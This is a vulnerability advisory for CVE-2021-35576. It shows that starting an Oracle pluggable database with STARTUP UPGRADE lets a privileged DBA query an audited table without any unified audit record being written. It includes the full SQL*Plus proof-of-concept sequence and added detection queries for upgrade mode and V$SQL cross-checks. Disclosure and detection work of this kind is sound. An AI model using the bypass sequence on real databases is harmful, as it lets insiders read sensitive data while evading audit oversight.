Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass
Product: Oracle Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 19c
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
Manufacturer Notification: 2021-03-17
Solution Date: 2021-10-17
Public Disclosure: 2022-06-11
CVE Reference: CVE-2021-35576
Author of Advisory: Emad Al-Mousa
Overview:
Oracle Database (RDBMS) is a general-purpose relational database management system.
Unified Auditing is the supported mechanism for recording audit records from the database's various audit sources into a single audit trail, exposed through the UNIFIED_AUDIT_TRAIL view. The audit views can be queried by users holding the AUDIT_ADMIN or AUDIT_VIEWER role; AUDIT_VIEWER is intended for users who only need to query the audit views and not create or enable audit policies.
*****************************************
Vulnerability Details:
This vulnerability allows a database administrator (or a system administrator with access to the database server, either through remote authentication or a local login) to bypass a unified audit policy that is in place in the Oracle database. Starting the database in upgrade mode (STARTUP UPGRADE) prevents the audit policy from being applied, so statements against an audited object can be executed without any audit record being written. Malicious operations can therefore be performed without detection.
*****************************************
Proof of Concept (PoC):
I'll create a table under the HR schema in PDB1 and add a few records to it:
SQL> CREATE TABLE HR.EMPLOYEE
(
FIRST_NAME VARCHAR2(50),
LAST_NAME VARCHAR2(50)
);
SQL> INSERT INTO HR.EMPLOYEE
(FIRST_NAME, LAST_NAME)
VALUES ('EMAD', 'MOUSA');
SQL> COMMIT;
SQL> INSERT INTO HR.EMPLOYEE
(FIRST_NAME, LAST_NAME)
VALUES ('SAMI', 'MOUSA');
SQL> COMMIT;
Now, I'll create an audit policy that records SELECT statements on the table, and enable it:
SQL> CREATE AUDIT POLICY SELECT_P1 ACTIONS SELECT ON HR.EMPLOYEE;
SQL> AUDIT POLICY SELECT_P1;
Check the audit policies enabled in PDB1:
SQL> SELECT * FROM audit_unified_enabled_policies;
Let's now simulate the execution of a SELECT statement against the audited/monitored table while the database is open in upgrade mode:
$ sqlplus / as sysdba
SQL> ALTER SESSION SET CONTAINER=PDB1;
SQL> SHUTDOWN IMMEDIATE
SQL> STARTUP UPGRADE
SQL> SELECT * FROM HR.EMPLOYEE;
SQL> STARTUP FORCE
SQL> EXEC SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;
Querying the unified audit trail shows no entry for the SELECT statement:
SQL> SELECT OS_USERNAME, USERHOST, DBUSERNAME, CLIENT_PROGRAM_NAME, EVENT_TIMESTAMP, ACTION_NAME, OBJECT_SCHEMA, OBJECT_NAME, SQL_TEXT FROM unified_audit_trail WHERE OBJECT_NAME = 'EMPLOYEE' ORDER BY EVENT_TIMESTAMP DESC;
Even though the audit policy is configured and enabled in the database, a DBA or system administrator can read the audited sensitive table without leaving a trace: no record for the SELECT is written to the UNIFIED_AUDIT_TRAIL view.
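The following checks are an added example and are not part of the original advisory. They assume the same PDB1 and HR.EMPLOYEE setup as the PoC above and are run as SYSDBA inside PDB1. They show how to tell whether the container is (or was) open in upgrade mode, and how to cross-check the unified audit trail against the shared pool (V$SQL), which still holds statements parsed during the unaudited window until they age out of the library cache.

```sql
-- Added example, not from the advisory: compensating checks for the
-- upgrade-mode audit gap. Assumes PDB1 and HR.EMPLOYEE from the PoC above,
-- connected as SYSDBA with the container set to PDB1.

-- 1. Open mode of the container. V$PDBS.OPEN_MODE is 'MIGRATE' while the PDB
--    has been started with STARTUP UPGRADE (for a CDB-level STARTUP UPGRADE,
--    V$INSTANCE.STATUS shows 'OPEN MIGRATE'). Statements run in that state are
--    not written to the unified audit trail, so this value is what to alert on.
SELECT name, open_mode, open_time
FROM   v$pdbs;

SELECT instance_name, status, startup_time
FROM   v$instance;

-- 2. The policy stays enabled during the bypass, so this check alone does not
--    reveal the gap; it only confirms the policy was not dropped or disabled.
SELECT policy_name, enabled_option, entity_name, success, failure
FROM   audit_unified_enabled_policies
WHERE  policy_name = 'SELECT_P1';

-- 3. Statements against the table that are still cached in the shared pool.
--    SQL parsed in upgrade mode is cached here like any other statement,
--    independently of auditing, until it ages out.
SELECT sql_id, parsing_schema_name, first_load_time, executions, sql_text
FROM   v$sql
WHERE  UPPER(sql_text) LIKE '%HR.EMPLOYEE%'
AND    UPPER(sql_text) NOT LIKE '%V$SQL%'   -- exclude this query itself
ORDER  BY first_load_time DESC;

-- 4. Audit records for the same object since the PDB was last opened. Flush
--    first so that queued records are visible in the view.
EXEC SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;

SELECT event_timestamp, dbusername, action_name, sql_text
FROM   unified_audit_trail
WHERE  object_schema = 'HR'
AND    object_name   = 'EMPLOYEE'
AND    event_timestamp >= (SELECT open_time FROM v$pdbs)
ORDER  BY event_timestamp DESC;

-- A statement listed in step 3 with no matching row in step 4 is the
-- unaudited access: it was executed while the container was in MIGRATE mode.
```

The V$SQL cross-check is a forensic aid, not a control: the shared pool is volatile and is cleared by the STARTUP FORCE in the PoC, so it only helps if it is queried before the next restart or captured by a regular job. The durable control is the vendor fix, together with alerting on any open mode of MIGRATE / OPEN MIGRATE outside a planned upgrade window.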
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html
https://nvd.nist.gov/vuln/detail/CVE-2021-35576
CVE-2021-35576 – Bypassing Unified Audit Policy
Credit:
Emad Al-Mousa – CVE-2021-35576